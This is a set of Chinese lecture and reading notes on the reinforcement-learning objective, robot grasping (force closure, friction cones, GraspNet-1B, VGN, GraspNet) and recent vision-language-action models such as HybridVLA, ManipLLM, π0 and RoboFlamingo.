$$ \begin{aligned} \theta^* &= \arg\max_\theta \mathbb{E}{\tau \sim p\theta(\tau)} \left[ \sum_t r(s_t, a_t) \right] \ &= \arg\max_\theta \mathbb{E}{(s_t, a_t) \sim p\theta(s_t, a_t)} \left[ r(s_t, a_t) \right] \end{aligned} $$

其中,$p_\theta(\tau) = p(s_1) \prod_{t=1}^T \pi_\theta(a_t|s_t) p(s_{t+1}|s_t, a_t)$ 是轨迹 $\tau$ 出现的概率。

注意这个式子暗含了马尔可夫性,因为状态转移概率 $p(s_{t+1}|s_t, a_t)$ 只依赖于 $s_t$ 和 $a_t$)。

有限时间界(Finite Horizon):最大化固定步数 $T$ (有限时间)内的总奖励期望。

$$ \theta^* = \arg\max_\theta \sum_{t=1}^T \mathbb{E}{(s_t, a_t) \sim p\theta(s_t, a_t)} [r(s_t, a_t)] $$

其中 $p_\theta(s_t, a_t)$ 是在 $t$ 时刻访问状态 - 动作对 $(s_t, a_t)$ 的概率(边际分布)。

RL 优化的是期望奖励:即使奖励函数本身不平滑,期望奖励 $\mathbb{E}{\pi\theta}[r(x)]$ 通常是关于策略参数 $\theta$ 平滑的,这使得基于梯度的优化方法成为可能。

💾

视觉与抓取 III

2025年4月4日 00:00

抓取

Form Closure 与 Force Closure

  • Form Closure(形闭合):这是一种纯粹基于几何的定义。指的是接触点(contact points)形成了一个 “笼子”,将物体完全包住。在不移动接触点的情况下,物体从几何上无法从这个 “笼子” 中逃逸。可以认为这是一种最理想、最稳固的包裹式抓取接触状态。其不依赖于摩擦力
  • Force Closure(力闭合):这个概念考虑了接触点的力和摩擦力。它指的是,虽然接触点可能没有形成几何上的 “笼子”,但通过在这些接触点上施加适当的力(利用摩擦力),可以抵抗施加在物体上的任意方向的力(force)和力矩(torque)。换句话说,只要夹爪(或手指)能提供足够大的力,理论上就能抵抗任何外来的扰动,或者能让物体产生任意方向的加速度和角加速度。其依赖于摩擦力

它们之间存在一个重要的关系:

$$ \text{Form Closure} \subset \text{Force Closure} \subset \text{Successful Grasp} $$

也即,严苛程度上:

$$ \text{Successful Grasp} \leq \text{Force Closure} \leq \text{Form Closure} $$

这意味着:

  • 如果一个抓取是 Form Closure,那么它一定也是 Force Closure。
  • 如果一个抓取是 Force Closure,那么它在理想情况下(夹爪力量足够)一定能成功抓起物体。
  • 但是反过来不一定成立。
    • 一个成功的抓取不一定是 Force Closure,比如轻轻托起一个物体,它只抵抗了垂直方向的力,如果施加一个水平方向的力,它就会滑动
    • 一个 Force Closure 也不一定是 Form Closure,比如用两个手指平行夹住一个方块的两侧,这不是 Form Closure,因为物体可以上下滑动。但如果考虑摩擦力,只要能施加足够的夹紧力,它可能是一个 Force Closure,能够抵抗各个方向的外力。

摩擦锥(Friction Cone)

为了理解 Force Closure,我们需要引入摩擦锥的概念。

考虑一个简单的物理场景:一个滑块放在水平面上,两者之间的静摩擦系数为 $\mu$。

显然,如果我们对滑块施加一个法向力(正压力) $N$,就能利用摩擦力将之固定在平面上。

现在考虑如下情形:如果施加一个与法线方向成 $\theta$ 角的力 $F$ 作用在接触点上。

friction_cone

这个力 $F$ 可以分解为法向分量 $F_{\perp} = F \cos \theta$ 和切向分量 $F_{\parallel} = F \sin \theta$。

为了使滑块不发生滑动,切向力必须小于等于最大静摩擦力,即:

$$ F_{\parallel} \le \mu F_{\perp} $$

代入分解后的力,得到:

$$ F \sin \theta \le \mu (F \cos \theta) $$

假设 $F \cos \theta > 0$,我们可以得到:

$$ \tan \theta \le \mu $$

令摩擦角 $\alpha = \arctan \mu$。这意味着,只要施加的力 $F$ 与接触面法线方向的夹角 $\theta$ 不超过 $\alpha$,无论这个力 $F$ 有多大(在理想情况下,假设物体和接触面都是刚体且不会被破坏),滑块都不会发生滑动。这种情况称为 自锁(self-locking)

在三维空间中,所有满足这个条件的力 $F$ 的方向构成了一个圆锥,称为 摩擦锥(Friction Cone)。这个锥体的轴线是接触点的法线方向,其半顶角就是摩擦角 $\alpha = \arctan \mu$。

任何作用在接触点且方向向量位于此摩擦锥内部(或边界上)的力,都不会导致该接触点发生滑动(不会有滑动摩擦,都是静摩擦)。

Force Closure 的数学定义

定义:一组摩擦接触实现 力闭合(force closure),如果其 力旋量锥(wrench cones)正向张成(positive span) 是整个 力旋量空间(wrench space)

思考一下,作用在一个刚体上的力的效果,它不仅会使物体 平移(力),还会使物体 旋转(力矩),而这就引入了六个自由度。

而为了同时描述作用在刚体上的力和力矩的 整体效果,我们将力和力矩组合成一个单一的向量,称为 力旋量(Wrench)

  • 在二维平面中,物体有 2 个平移自由度(在平面内)和 1 个旋转自由度(绕垂直于平面的轴)。因此,力旋量是一个 3 维向量:

    $$ \mathcal{F} = \begin{bmatrix} f_x \ f_y \ \tau_z \end{bmatrix} \in \mathbb{R}^3 $$

    前两个分量是平面内的力,最后一个分量是绕垂直轴的力矩。

  • 在三维空间中,物体有 3 个平移自由度和 3 个旋转自由度。因此,力旋量是一个 6 维向量: $$ \mathcal{F} = \begin{bmatrix} \mathbf{f} \ \boldsymbol{\tau} \end{bmatrix} = \begin{bmatrix} f_x \ f_y \ f_z \ \tau_x \ \tau_y \ \tau_z \end{bmatrix} \in \mathbb{R}^6 $$ 前三个分量是力,后三个分量是力矩。

现在,我们可以更精确地定义 Force Closure。一个抓取被称为 Force Closure,是指所有接触点的摩擦锥组合起来,能够产生抵抗任意施加于物体的 力旋量(Wrench) 的能力(和最初那个定义等价)。

我们将空间中的每个摩擦锥用一定数量(记为 $k$,课中选择为 $k = 6$)的力旋量组成的多面体锥来近似,从而摩擦锥可以表示为这 $k$ 个力旋量的线性组合。

接触点决定力,方向决定力矩

如此考虑所有的摩擦锥,我们定义 抓取矩阵 F(Grasp Matrix F)

$$ F = \begin{bmatrix} \mathcal{F}_1 & \cdots & \mathcal{F}_j \end{bmatrix} \in \mathbb{R}^{n \times j},\ n = 3 \text{ or } 6,\ j = k \times C $$

其中,$C$ 是接触点(摩擦锥)的数量,$k$ 是为了近似每个摩擦锥所使用的力旋量数量(也即用多少面体锥来近似摩擦锥)。

那么,力闭合的数学化表达(充要条件)就是:

$$ \text{rank}(F) = n \text{ (3 or 6)} \ Fk = 0 \text{ for some } k \in \mathbb{R}^j, k_i \ge \epsilon > 0 \text{ for all } i $$

第一个条件

$$ \text{rank}(F) = n \text{ (3 or 6)} $$

这个条件意味着 $F$ 的 $j$ 个列向量 $\mathcal{F}_1, \dots, \mathcal{F}_j$ 能够张成整个 $n$ 维的任务空间 $\mathbb{R}^n$。

物理意义:为了能够抵抗任意方向的外部扰动(力 / 力矩),我们施加的接触力 / 力旋量的组合必须能够产生任意方向的合力 / 合力旋量。如果 $\mathrm{rank}(F) < n$,那么 $F$ 的列向量只能张成 $\mathbb{R}^n$ 的一个子空间。这意味着存在某些方向的外部扰动,无论我们如何调整接触力的大小(即对 $\mathcal{F}_i$ 进行线性组合),都无法产生一个能够与之平衡的合力 / 合力旋量。

第二个条件

$$ Fk = 0 \text{ for some } k \in \mathbb{R}^j, k_i \ge \epsilon > 0 \text{ for all } i $$

这个条件意味着存在一个线性组合,使得合力 / 合力矩为零,并且这个组合中的 所有系数 $k_i$ 都必须是严格正的 (大于某个很小的正常数 $\epsilon$)。这意味着我们可以通过同时施加正向的力(或在摩擦锥内的力)来实现力的平衡。

为什么需要严格大于零($>\epsilon$)?这保证了原点不在凸锥的边界上。如果原点在边界上,可能存在某些方向的扰动,虽然理论上可以被平衡,但在实际中(考虑到力的限制、接触的不确定性等)可能无法稳定地抵抗。严格大于零提供了鲁棒性,使得抓取更加稳定,并且能够抵抗微小的扰动。

物理 / 几何意义:这个条件与凸包(Convex Hull)或锥组合(Conic Combination)的概念紧密相关。具体来说,它等价于零向量(原点)严格位于由接触力旋量向量 ${\mathcal{F}_1, \dots, \mathcal{F}_j}$ 生成的凸锥(Convex Cone)的内部。

合并条件

如果这两个条件都满足,那么对于施加在物体上的任何外部力旋量 $w_{ext}$(或者等价地,对于想要让物体产生的任何加速度 $a$ 和角加速度 $\alpha$,它们对应一个需要施加的力旋量 $w_{req}$),我们都能找到一组非负的系数 $k' = [k'_1, k'_2, \ldots, k'J]^\top$ ($k'i \ge 0$),使得 $Fk' = -w{ext}$ (或 $Fk' = w{req}$)。

因为所有 $k'_i \ge 0$,这意味着所需的接触力都在各自(近似的)摩擦锥内,因此不会发生滑动。

不过,这个理论推导假设接触点可以施加任意大的力。在实际机器人中,执行器(电机)的力 / 力矩是有限的。所以,即使一个抓取满足 Force Closure 条件,如果需要抵抗的外力过大或需要产生的加速度过大,超出了机器人的能力范围,抓取仍然会失败。

Force Closure 应用

Force Closure 的概念是合成大规模抓取标注数据集(Grasp Data Synthesis)的关键技术之一。

合成抓取数据集的两个经典方法:

  • 利用 Force Closure 大量生成抓取标签
  • 在 Simulater 中设置不同的重力方向($x,y,z,-x,-y,-z$),看会不会掉出来,来近似判断

GraspNet-1B 数据集

GraspNet-1B 数据集的生成流程大致如下:

  1. 获取物体模型:通过 3D 扫描收集一批物体的三维模型。
  2. 物体上抓取姿态采样:对每个物体模型,在其表面采样大量的候选抓取位姿(gripper pose),包括位置和朝向。例如,可以在物体表面均匀采样点(FPS 算法),然后将夹爪中心对准采样点,朝向可以基于表面法线并加入随机旋转。
  3. Force Closure 筛选:对每个采样得到的抓取姿态,给定一个摩擦系数 $\mu$(例如 $\mu=0.8$),使用前面所述的数学条件判断它是否满足 Force Closure。只保留满足条件的抓取姿态作为该物体的有效抓取标签。
  4. 场景生成与物体位姿标注:创建包含多个物体的三维场景(例如,将物体随机摆放在桌面上)。需要知道场景中每个物体的精确 6D 位姿。GraspNet 最初通过将真实物体摆放在桌面上,然后使用 RGB-D 传感器数据和物体模型进行匹配来标注位姿。(现在可以完全在仿真环境中生成场景和物体的精确位姿)。
  5. 抓取标签转换与碰撞检测:将步骤 3 中得到的物体中心坐标系下的有效抓取标签,利用步骤 4 中得到的物体位姿,转换到场景坐标系下。然后,检查在这个场景中,当夹爪移动到抓取位置(以及接近过程)时,是否会与场景中的其他物体发生碰撞。去除会发生碰撞的抓取标签。
  6. 多视角渲染:对于每个生成好的带有有效、无碰撞抓取标签的场景,从多个不同的虚拟相机视角进行渲染,生成 RGB 图像、深度图、点云等数据,从而在人工参与恒定的情况下扩大数据集。每一个数据点就构成了一个(输入数据,有效抓取标签)的配对。

关于摩擦系数的讨论

GraspNet 数据集实际上为不同的 $\mu$ 值(如从 0.8 到 0.1)都进行了筛选并存储了标签。

$\mu$ 值越低,对抓取的要求越高(更接近 Form Closure),这样的抓取在低摩擦表面上更可能成功。

训练时,有时会选择使用在较低 $\mu$(如 0.1)下仍然满足 Force Closure 的标签,认为这些是更高质量、更鲁棒的抓取,在真实世界中会拥有最好的泛化性,尽管这会大大减少标签数量(从 10 亿减少到几百万)。

这是一个标签数量和质量之间的权衡(Trade-off)。

意义

GraspNet-1B 的生成流程在当时是开创性的,但也有其局限性。例如,它依赖于扫描的真实物体和在真实桌面上进行的位姿标注,限制了物体种类和场景背景的多样性。

如今,随着高质量三维模型库(如 ObjectVerse XL 包含千万级模型)和逼真渲染技术的发展,完全可以在仿真环境中生成更大规模、更多样化的抓取数据集。物体模型、场景布局、纹理、光照等都可以程序化生成,无需依赖真实扫描和物理摆放,这大大提高了效率和数据的泛化潜力(还是王老师一直强调的观点,合成数据的潜力是巨大的 )。

尽管 GraspNet-1B 的物体和背景多样性有限,但它证明了使用基于三维几何信息(如点云)作为输入的模型,即使只在相对有限的数据上训练,也能学到在杂乱场景中进行抓取的有效策略。这说明三维几何本身提供了强大的先验信息。 然而,若要训练能直接从二维图像(RGB 或 RGB-D)输入的模型,并使其泛化到未见过的物体和环境,就需要更大规模、更多样性的合成数据。

抓取检测问题(Grasp Detection)

将抓取问题形式化(Formulate)为一个检测问题,是解决机器人抓取的一种常用方法。

目标:给定场景的某种表示(如点云、RGB-D 图像、体素网格),算法需要输出一系列候选的抓取姿态(Grasp Poses)。每个姿态通常包含位置(3 DoF)、朝向(3 DoF)和夹爪宽度(1 DoF),并附带一个质量评分(Quality Score)或成功概率。

输入模态

三维几何表示

举例:点云(Point Cloud)、体素网格(Voxel Grid)、截断符号距离场(TSDF - Truncated Signed Distance Function)。

  • 点云:最直接的表示方式,每个点包含位置和法线信息。
  • 体素网格:体素就是三维空间中的像素(小方格),通过将空间均匀划分,就得到体素网格。
  • TSDF:一种常见的体素网格表示。每个体素存储一个值,表示该体素中心到最近物体表面的有符号距离,并且这个距离值通常会被截断在一个范围内(例如 -10cm 到 +10cm)。正值表示在表面外,负值表示在表面内,0 表示在表面上。

由于抓取的物理稳定性主要取决于物体的局部几何形状(决定了接触点、法线、曲率等),而不是颜色或纹理,所以直接使用几何信息作为输入被认为更直接、更有效,尤其是在 GraspNet-1B 这类几何信息丰富但视觉外观多样性有限的数据集上(意思就是 3D 比 2D 信息更好,不需要用 RGB 反推几何信息,而是直接就是和任务密切相关的几何信息)。

这里老师还提到了一个 Partical / Complete 的说法挺有意思的,就是说你想建模完整的三维场景,那就需要多视角的数据,否则单视角会因为重叠而导致信息缺失。

二维图像表示

举例:RGB 图像、深度图像(Depth Image)。

2D 信息往往隐式包含几何信息。

基于 TSDF 的抓取(VGN)

VGN

VGN 直接在三维体素空间中对抓取位姿进行预测。

输入:一个表示了场景几何的 3D 体素网格,例如一个 40x40x40 的 TSDF 网格。

网络结构:通常采用类似 U-Net 的 3D 全卷积网络结构。

输出:总体预测三个体素网格,即对于输出网格中的每一个体素,网络预测:

  1. 抓取质量(Grasp Quality/Score):一个标量值,表示以该体素为中心的抓取成功的概率或质量。

  2. 抓取朝向(Grasp Orientation):描述夹爪应该如何旋转。通常采用四元数格式。

  3. 抓取宽度(Grasp Width):一个标量值,表示执行抓取时夹爪需要张开的宽度

    预测宽度的主要目的是防止夹爪过宽向外碰撞,而不是为了确定要多宽才能夹,实际操作都是直接夹到不能继续为止(工程 Trick)。

抓取任务评估

常用任务:清理桌面(Table Clearing)或箱中取物(Bin Picking)。这类任务的目标是将一个杂乱堆叠的物体集合逐一抓取并移除。

评估指标:

  • 抓取成功率(Success Rate):成功抓取次数 / 总尝试抓取次数。
  • 清理率(Percentage Cleard):成功移除的物体数量 / 场景中总物体数量。
  • 规划时间(Planning Time):接收输入与返回抓取之间的时间间隔

特点:

  • 非特定对象(Object Agnostic):算法通常不区分物体身份,哪个物体看起来最好抓(预测得分最高)就先抓哪个。
  • 非任务导向(Non-Task-Oriented):不关心抓取物体后的具体用途(即无语义信息,不关心是递给别人、是用来倒水、还是装配),只关心能否稳定地把物体 “提起来”。
  • 过程简化:评估时,抓取后的放置阶段可能被简化,例如直接移动到一个固定区域放下,甚至允许在移动过程中发生碰撞,只要物体被成功从初始位置拿起就算成功。

后处理

  • 通过 高斯平滑 提升预测的鲁棒性和区域一致性。

  • 通过 距离掩膜 保证抓取的物理和运动学可行性,如果 TSDF 值高过阈值,那就认为距离表面太深了手指不可达,将其 Mask 掉。

  • 通过 NMS 以抓取质量分数指标去除冗余预测,得到精简且有代表性的抓取候选集。

    但这里老师也说了,仅仅这样不够好,因为光看 Grasp Quality 的话,没考虑 Orientation / Width,即使前面这个准了后面不准也没用,所以光靠前面抑制其实也不太好

损失函数

VGN 的损失函数通常是针对前文所述三个输出分别计算,然后加权求和。

  • 质量损失:通常使用二元交叉熵损失(Binary Cross-Entropy Loss),因为这里是一个 0/1 二分类变量

    但老师后面又说了这个抓取质量的指标显然不是一个阶跃的,而是 具有一定平滑性 的,在一个点能抓起来,其附近也应当能抓起来,这就是为什么要进行高斯核平滑后处理

  • 方向损失:L2,但只对那些真实抓取标签为正的体素(就是真的能抓起来的地方)计算。

  • 宽度损失:同上

Sim2Real Gap

VGN 使用了大量合成数据进行训练,但能够在真实机器人上较好地工作(Sim2Real Transfer),关键原因在于其依赖的是几何表征,它不考虑颜色、纹理等视觉信息,只关注物体的形状和抓取器的几何匹配。

Sim2Real 的工作都会有 Gap,但是否 Work 要看 Gap 重不重要,影响大不大。

  • 合成数据中的深度信息是完美的,而真实传感器采集的深度图存在噪声
  • VGN 使用的 TSDF 表征,特别是当体素分辨率不高时(例如,40x40x40 的格子,每个格子边长可能达到厘米级),对几毫米级别的深度噪声不敏感。小的表面凹凸或噪声在体素化后会被平滑掉,不会显著改变 TSDF 的值。
  • 因此,即使训练于完美深度数据,模型在面对带噪声的真实深度时,性能下降有限。

对于夹爪式抓取,现实中的成功率往往不低于甚至高于仿真(Sim2Real 甚至可以是负的!)

  • 力闭合与变形:夹爪在闭合时通常会持续施力直至完全闭合或达到力 / 行程限制。这个过程可以轻微移动物体、压紧物体,甚至使软性物体发生形变,从而形成更稳固的接触面。这些物理效应在标准仿真中可能未被完全模拟,但在现实中是有利的。
  • 摩擦力问题:如果担心仿真中摩擦系数不准(如仿真中认为能抓住,现实中太滑抓不住),可以通过简单的工程手段解决,例如在夹爪指尖贴上高摩擦系数的材料(如橡胶垫)。
  • 仿真中的 Artifacts:有时仿真环境自身的问题(如碰撞检测不准、物理模拟不稳定)反而会导致仿真中抓不住,而现实中没问题。

机器人学是一个应用学科,最终目标是解决问题,真机表现是最终检验标准。

VGN 的局限性

  • 多视角依赖:对于相互遮挡严重的场景(cluttered scene),单视角可能无法看到被遮挡物体的完整几何形状,导致 TSDF 不准确,进而无法规划出好的抓取。VGN 需要较好的多视角观测来构建完整的场景 TSDF。
  • 精度限制:由于使用体素表示,其抓取位姿(特别是平移)的精度受限于体素大小。理论上的最高平移精度约为半个体素边长。这对于需要高精度操作的任务可能是个问题。
  • 计算 / 内存与精度的权衡:提高体素分辨率可以提升精度,但会导致内存和计算量急剧增加(通常是分辨率的三次方)。

基于点云的抓取(GSN / GraspNet)

点云是另一种重要的三维表示。

  • 轻量级 / 高效性:点云只表示物体表面,不像体素需要表示整个空间(包括空白区域)。对于同样场景,点云的点数通常远少于体素数(几万点 vs 几十万体素)。
  • 高分辨率 / 精度:理论上,点云中每个点的坐标可以是连续值,可以达到很高的空间分辨率,只要相机 / LiDAR 精度足够。

GraspNet 架构

GraspNet

GraspNet 将复杂的六自由度抓取姿态预测分解为一系列更简单的问题。

先大致说一下方法:

  1. 在表面选择接触点
  2. 在接触点为中心的一个半球面上均匀采样 256 个方向,得到一个旋转轴
  3. 绕旋转轴旋转夹爪
  4. 沿旋转轴深入夹爪

整个过程将原本抓取位姿的 6 DoF 自由度进行了多阶段划分

  1. 位移的 3 DoF
    1. 接触点的选择带来了 2 DoF
    2. 深入夹爪带来了 1 DoF
  2. 旋转的 3 DoF
    1. 旋转轴的轴向带来了 2 DoF
    2. 夹爪绕旋转轴旋转角度带来了 1 DoF

真实操作流程:

  1. 网络首先在输入点云的每个点上预测一个 “可抓取性” 分数(Graspness Score),表示该点作为抓取接触点的优劣程度。

  2. 保留分数高的点作为候选抓取中心点(从 N 个点降到 M 个点)。

  3. 对于每个候选点,预测最佳的抓取器接近方向(Approach Vector / View)。这通常是在以该点为中心的半球面上采样多个方向进行评估。

  4. 对于选定的 “点 - 方向” 对,需要确定绕着接近方向的旋转角(In-plane Rotation Angle)以及夹爪最终的张开宽度或深入深度(Depth)。

    Cylinder Grouping:在候选点附近,沿着接近方向定义一个圆柱体区域,聚合该区域内所有点的特征。这个聚合后的特征被用来预测最佳的旋转角和深度 / 宽度。

GraspNet 成功的本质

  1. 点云的优良性质:准确、轻量、效率高、精度高
  2. 架构:端到端网络,多阶段设计,每个阶段都有监督信号,稳定
  3. 泛化性:局部性与平移等变性
    1. 局部性:Cylinder Grouping 聚合,依赖候选点周围的局部几何信息判断,而不太关心场景中其他远处的物体。
    2. 平移等变性(Translation Equivariance):类似二维情形,模型学习到的几何模式识别能力不随物体在空间中的位置变化而失效。

GraspNet 的核心在于学习 局部几何特征(Local Geometric Features) 与抓取成功的关系。

例如,一对平行的小平面、一个合适的边缘或角落,这些局部形状无论出现在哪个物体上,都可能指示一个好的抓取点。当模型在训练数据(如 GraspNet-1B 的数百个物体)中见识了足够多样的局部几何模式后,就能泛化到包含相似局部几何的新物体上,即使整体形状从未见过。

这个局部泛化是非常本质的,因为它对某一位置是否适合抓进行了深入学习。

抓取的条件生成模型

无论是 VGN 还是 GraspNet,它们本质上是 检测(Detection) 方法。它们从场景中预测(检测)出一系列离散的、得分较高的抓取候选。最后通常还需要进行非极大值抑制(NMS)来去除冗余的候选。然而,理论上一个物体可能有无限多种抓取方式,检测式方法只能给出有限的几个解。

随着生成模型(如 GANs、VAEs、Diffusion Models)的发展,研究者开始探索直接生成抓取姿态的方法。目标是学习抓取姿态的 分布(Distribution),然后从中采样。

动机:对于具有高自由度(如 20+ DOF)的灵巧手(Dexterous Hand),抓取姿态空间巨大,传统的采样 + 评估或检测方法变得非常困难。生成模型提供了一种直接建模和采样高维复杂分布的途径。

不过,训练强大的生成模型通常需要极大规模的数据集(DexGraphNet 使用了一个包含 10 亿级别抓取样本的数据集)。生成如此规模的灵巧手抓取数据本身就是一个挑战,需要专门设计的抓取规划与优化管线。

该工作采用 条件扩散模型

  1. 首先,类似 GraspNet,在点云上识别出潜在的、适合抓取的接触点
  2. 在选定的接触点周围(用一个球形区域) 提取局部几何特征 $F$。这个特征 $F$ 编码了该点附近的形状信息
  3. 条件扩散,逐步去噪,学习出条件概率分布

如果你对扩散模型 / 条件扩散模型 / DDIM 的推导感兴趣,笔者推荐如下内容:

💾

VLA Frontier

2025年3月27日 07:39

AIGC Declaration

本文使用了 AIGC 来提高效率,其中可能存在谬误,我已尽力检查并校对,但仍不保证完全准确,欢迎指正。

本文依赖于我编写的 arXiv Tex 源码获取 Pipeline,这里是 Repo,欢迎使用!

HybridVLA

Paper

hybirdvla

Insight

  1. 传统自回归(AR,RT-2/OpenVLA)方法为了将动作作为 token 用 LLM 去预测,将动作离散化,破坏了动作连续性
  2. 扩散方法(Diffusion,CogACT/DiVLA)的扩散头独立于 LLM,无法利用语言模型的推理能力
  3. 设计一种办法协同 AR 和 Diffusion,从而兼顾两者的优点,同时充分利用 LLM

Method

Arch

Backbone:

  1. Vison Encoder:DINOv2(语义特征)+ SigLIP(细粒度特征)
  2. Prompt Encoder:LLAMA-2 (7B) / Phi-2 (2.7B)

整体 Token 序列结构:

$$ \text{Input Tokens} = \underbrace{[V_1,...,V_N]}{\text{视觉}} \oplus \underbrace{[L_1,...,L_M]}{\text{语言}} \oplus \underbrace{[R]}_{\text{机器人状态}} \oplus \underbrace{[\text{}, a^{i}t, i, \text{}]}{\text{扩散部分}} \oplus \underbrace{[A^{ar}_1,...,A^{ar}K]}{\text{AR 动作}} $$

  1. 编码后(V,L,R),插入一个特殊的扩散开始 Token $\text{}$ 与掩码 $\text{}$ $$ \text{Input Tokens} = \underbrace{[V_1,...,V_N]}{\text{视觉}} \oplus \underbrace{[L_1,...,L_M]}{\text{语言}} \oplus \underbrace{[R]}_{\text{机器人状态}} \oplus \text{} \oplus \text{} $$

  2. 然后进行扩散 Token 预测,使用得到的 Token 进行去噪,得到扩散动作 $a^d$

    $$ a^d = a^0 = [\Delta x, \Delta y, \Delta z, \text{Roll}, \text{Pitch}, \text{Yaw}, \text{Gripper(0/1)}] $$

  3. 对得到的扩散动作 $a^d$,重新使用 MLP 映射回 LLM,得到 $e_{a^d}$,插入特殊的扩散结束 Token $\text{}$,重构得到序列

    $$ [V][L][R][\text{}][e_{a^d}][\text{}][\text{}] $$

  4. 基于新序列预测 AR Token,再经过 Detokenizer,得到动作 $a^{ar}$(动作离散到 256 个动作区间,概率值)

  5. 计算 AR 动作置信度 $c^{ar}$

    $$ c^{ar} = \frac{1}{7}\sum_{k=1}^7 \max(p(A_k)) $$

  6. 根据置信度,判断是要融合 AR 动作与扩散动作还是直接使用扩散动作 $$ a_{final} = \begin{cases} 0.5a^d + 0.5a^{ar}, & \text{if } c^{ar} > 0.96 \ a^d, & \text{otherwise} \end{cases} $$

直观理解

  1. 扩散模式:自动驾驶(精确控制油门 / 刹车)
  2. AR 模式:语音导航("前方路口左转")
  3. 当导航指令清晰时(高置信度),自动驾驶会参考语音提示;当导航模糊时,完全依赖自动驾驶

现在,HybridVLA 既保持了语言模型的强推理能力,又获得了物理级的动作连续性,突破了传统 VLA 模型的性能瓶颈。

Loss function

$$ \mathcal{L}{dif}=E{a,i,c}||\epsilon-\epsilon_\pi(a_t^i,i,c)||^2 \ \mathcal{L}{hybrid}=\mathcal{L}{dif}+\mathcal{L}_{ce} $$

Trick

  • KV 缓存加速
  • 降低 Diffusion 去噪步数以加速生成

Question

为什么 AR 不加 diffusion,难道没语义了吗

ManipLLM

Paper

manipllm

Why

  • 基于有限数据集学习的方法见过的物品类别是有限的,难以泛化到现实世界
  • 过往的模型无法解释自身的结果(可解释性差),是个黑箱

Insight

  1. 通过 类别 → 区域 → 位姿 的渐进式训练将 MLLM(多模态大语言模型,Multimodal Large Languege Model)基于互联网级别数据所习得的常识和推理能力与之前看似黑箱的机器人操作去逐渐对齐,类似 COT 思维链完成渐进式思考,从而得到由粗到细的高可解释性动作预测
  2. 直接让 MLLM 去对图片进行预测哪里可以动可能效果是不 OK 的,但根据 Affordance Map 生成若干个点来让 MLLM 进行选择(选择题比填空题好做)是 OK 的。

Method

Arch

Backbone:

  • 视觉编码器:CLIP 的 ViT
  • 文本编码器:LLaMa 的 Tokenizer
  • 多模态对齐:通过适配器(Adapter)将视觉特征与 LLaMa 的文本空间对齐,仅微调适配器参数,保留 MLLM 原有知识。

Loss Function

$\mathcal{L}_A$ 可供性损失

目标:教会模型识别物体表面可操作区域

训练方式:

  1. 首先根据可供性图 $\mathcal{A}$ 来在图片中随机选择一系列点,包括 $n$ 个正样本($\mathcal{A} \geq 0.8$)、 $n$ 个负样本($\mathcal{A} \geq 0.8$),分别标记为 1、0
  2. 将点的位置送入 MLLM,进行提问:“确定在以下每个点上操作是否可以有效地操纵图像中的对象?” + ${x_i, y_i}^{2n}_{i=1}$
  3. 获得模型输出词元概率序列 ${p_i}^n_{i=1}$,注意这里不是 0/1,而是 LLM 输出此处为 True 这个词元的概率
  4. 计算交叉熵损失: $$ \mathcal{L}A = -\frac{1}{2n} \sum{i=1}^{2n} \left[ y_i \log p_i + (1 - y_i) \log (1 - p_i) \right] $$
$\mathcal{L}_M$ 语言建模损失

目标:通过 “填空” 训练模型预测被遮挡的位姿参数

训练方式 MLM(Mask Language Modeling,完形填空) :

  1. 随机遮挡坐标或方向分量,如将 “接触点是 $(80,120)$” 改为 “接触点是 $(\text{[MASK]},120)$”
  2. 每个被遮挡值离散化为 100 个区间
  3. 模型预测被遮挡位置的类别概率分布 $q_j$,计算交叉熵(真实标签以 one-hot 编码,$c_j$ 为真实类别编号): $$ \mathcal{L}M = -\sum{j \in \text{masked}} \log q_j[c_j] $$
$\mathcal{L}_F$ 位姿预测损失

目标:直接训练模型预测完整位姿参数,包括:

  • 接触点坐标 $(x, y)$
  • 夹爪上方向 $(x_u, y_u, z_u)$
  • 夹爪前方向 $(x_f, y_f, z_f)$

注:三维空间坐标由深度图投影得到。

训练方式:类似 $\mathcal{L}_M$,用 MLM 方式来计算损失

总损失

$$ \mathcal{L} = \mathcal{L}_A + \mathcal{L}_M + \mathcal{L}_F $$

注意这里,$\mathcal{L}_A$ 提供的区域先验可以帮助 $\mathcal{L}_M$ 和 $\mathcal{L}_F$ 更准确定位接触点。

  1. $\mathcal{L}_A$ 先教会模型 “哪里能操作”
  2. $\mathcal{L}_M$ 再训练 “如何补全参数”
  3. $\mathcal{L}_F$ 最终实现 “端到端预测”

主动阻抗适应策略

问题:方向预测可能存在误差

解决办法:在初始方向附近随机添加多个扰动方向,随后挨个试,每个施加一个固定的阻抗力,测量位移,选择最大的位移方向。

测试时适应(TTA)

问题:Sim-to-Real 差异(如光照、纹理变化)导致位姿预测偏移。

策略:在线更新视觉适配器(Visual-Adapter,连接 CLIP 视觉编码器和 LLaMa 语言模型,参数很少,就是一个轻量 MLP)参数

  1. 输入当前测试样本的位姿预测结果 $(x,y)$
  2. 根据实际操作成败生成二元标签(成功 → “yes”,失败 → “no”)
  3. 通过 $\mathcal{L}_A$ 微调视觉适配器,适应真实场景的视觉特征。

π0

pi0

Why

  1. 现有数据集太少,无法习得通用能力
  2. 基于 AR 的动作生成方法难以实现高频控制(但现有的基于扩散的模型已经改进了一些),流匹配是扩散的一种变体,适合生成高频、复杂、精细的动作块

Insight

  1. VLM + Flow Matching = new VLA
  2. 不能只在高质量数据集上训练,否则鲁棒性(容错性)不强,无法在真实世界中使用,解决方案是先在低质量、大量的混合机器人数据上学习,然后再在高质量数据集上进行微调,精进技能

Method

基本就是引入了流匹配来替换扩散模型,这是一种相较于扩散更直观的生成模型,关于流匹配的推导、代码和直观讲解可以参见 Meta 的综述

flow_matching

flow_matching_with_cond

RoboFlamingo

Paper / 作者解读

roboflamingo

Insight

感觉没啥新的,可能是我看的顺序问题,先看了今年 / 去年的,潜移默化地感觉这个结构似乎已经是一个范式了。

Method

Arch

  1. ViT(预训练) + Resampler 下采样(通过自注意力机制实现)降低 Token 数量,得到视觉 Token

    $$ \hat{X}_t^v=\text{ViT}(I_t,G_t) \ \text{Resampler: }K_R=\hat{X}_t^vW_K^R, V_R=\hat{X}_t^vW_V^R, X_t^v=\text{softmax}(\frac{Q_RK_R^T}{\sqrt{d}})V_R $$

  2. LLM(预训练)得到文本 Token

    $$ X = X_t^1=\text{LLM}(L_t) $$

  3. 特征融合:堆叠 $L$ 层解码器,每层结构包括:

    1. 使用交叉注意力,以 Text Token 做 Query,Visual Token 做 Key / Value,进行残差连接
    2. 随后进行自注意力,依旧进行残差连接,从而完成视觉与语言特征的融合

